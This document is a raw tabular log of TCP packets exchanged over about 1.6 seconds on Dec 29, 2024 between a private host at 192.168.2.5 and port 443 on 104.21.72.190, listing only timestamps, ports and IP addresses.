Dec 29, 2024 09:23:17.283055067 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.288794041 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.288809061 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.288872957 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.288892031 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.289175034 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.294058084 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.294078112 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.294132948 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.294142962 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.294164896 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.294188023 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.300421953 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.300441980 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.300519943 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.300534010 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.300620079 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.376178980 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.376197100 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.376266003 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.376281977 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.376336098 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.467921972 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.467946053 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.468019009 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.468077898 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.468127966 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.473001003 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.473021030 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.473084927 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.473100901 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.473190069 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.478286028 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.478307962 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.478379011 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.478389978 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.478754044 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.484343052 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.484359980 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.484426022 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.484440088 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.484477043 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.490225077 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.490242958 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.490298033 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.490318060 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.490345955 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.490364075 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.496323109 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.496340990 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.496395111 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.496407032 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.496510983 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.501878023 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.501893044 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.501933098 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.501945019 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.501975060 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.501991034 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.577920914 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.577945948 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.577995062 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.578011990 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.578042030 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.578058004 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.669383049 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.669409990 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.669502020 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.669550896 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.671123981 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.674299002 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.674320936 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.674370050 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.674386024 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.674412012 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.674432993 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.680381060 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.680417061 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.680449009 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.680454969 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.680495024 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.686188936 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.686211109 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.686252117 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.686258078 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.686288118 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.686305046 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.691453934 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.691472054 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.691530943 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.691538095 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.691606998 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.697809935 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.697828054 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.697870970 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.697877884 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.697910070 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.703089952 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.703108072 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.703157902 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.703164101 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.703197002 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.703217983 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.779165983 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.779192924 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.779228926 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.779241085 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.779263020 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.779280901 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.870506048 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.870522022 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.870577097 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.870584965 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.870623112 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.875881910 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.875896931 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.875932932 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.875940084 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.875987053 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.875987053 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.881906986 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.881922007 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.881968975 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.881977081 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.882026911 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.887176991 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.887191057 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.887237072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.887243032 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.887490988 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.893115997 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.893131018 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.893172979 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.893182039 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.893209934 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.893229008 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.899173975 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.899188995 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.899220943 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.899228096 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.899252892 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.899277925 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.904865980 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.904880047 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.904936075 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.904942989 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.904975891 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.980526924 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.980551958 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.980597973 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.980628014 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:17.980643988 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:17.980669022 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.071940899 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.071959972 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.072035074 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.072063923 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.072088003 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.072107077 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.077275991 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.077291012 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.077353001 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.077366114 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.077476978 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.083448887 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.083463907 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.083507061 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.083517075 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.083549976 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.083564997 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.088594913 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.088613987 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.088648081 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.088660002 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.088685036 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.088701010 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.094652891 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.094669104 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.094728947 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.094742060 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.094820976 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.100559950 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.100574970 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.100631952 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.100642920 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.100689888 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.106158018 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.106172085 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.106214046 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.106221914 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.106245995 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.106264114 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.182053089 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.182071924 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.182136059 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.182151079 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.182178020 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.182195902 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.273483992 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.273502111 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.273578882 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.273614883 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.273674011 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.278759003 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.278774977 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.278847933 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.278881073 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.278938055 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.284703970 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.284719944 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.284797907 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.284821033 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.284945011 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.289980888 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.289998055 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.290064096 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.290105104 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.290158987 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.295934916 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.295949936 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.295995951 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.296013117 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.296026945 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.296060085 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.301925898 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.301942110 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.302025080 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.302032948 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.302073002 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.307656050 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.307676077 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.307722092 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.307750940 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.307765961 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.307795048 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.383317947 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.383342028 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.383388042 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.383423090 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.383444071 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.383523941 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.474750996 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.474773884 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.474828005 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.474853992 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.474867105 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.474889040 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.480389118 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.480405092 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.480458021 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.480465889 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.480515003 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.486243963 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.486258984 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.486344099 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.486352921 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.486517906 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.491378069 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.491393089 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.491455078 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.491462946 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.491554976 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.497415066 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.497430086 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.497498035 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.497528076 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.497576952 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.503051996 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.503067970 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.503108025 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.503114939 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.503144026 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.503170967 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.509047031 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.509062052 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.509120941 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.509128094 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.509207964 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.584502935 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.584531069 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.584669113 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.584696054 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.584916115 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.676215887 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.676240921 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.676299095 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.676342964 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.676367998 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.676389933 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.681556940 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.681576967 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.681646109 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.681655884 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.683779001 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.687536955 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.687555075 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.687625885 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.687634945 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.687663078 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.687686920 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.693533897 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.693548918 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.693605900 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.693615913 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.693670034 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.698800087 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.698816061 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.698884010 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.698895931 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.699145079 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.704610109 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.704632044 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.704695940 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.704711914 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.704762936 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.710414886 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.710433960 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.710500002 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.710510015 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.710606098 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.786065102 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.786087036 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.786142111 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.786175966 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.786191940 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.786806107 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.877899885 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.877926111 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.877996922 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.878048897 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.878129005 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.883225918 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.883248091 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.883331060 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.883341074 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.883450031 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.889158010 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.889178038 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:18.889306068 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:18.889313936 CET	443	49709	104.21.72.190	192.168.2.5
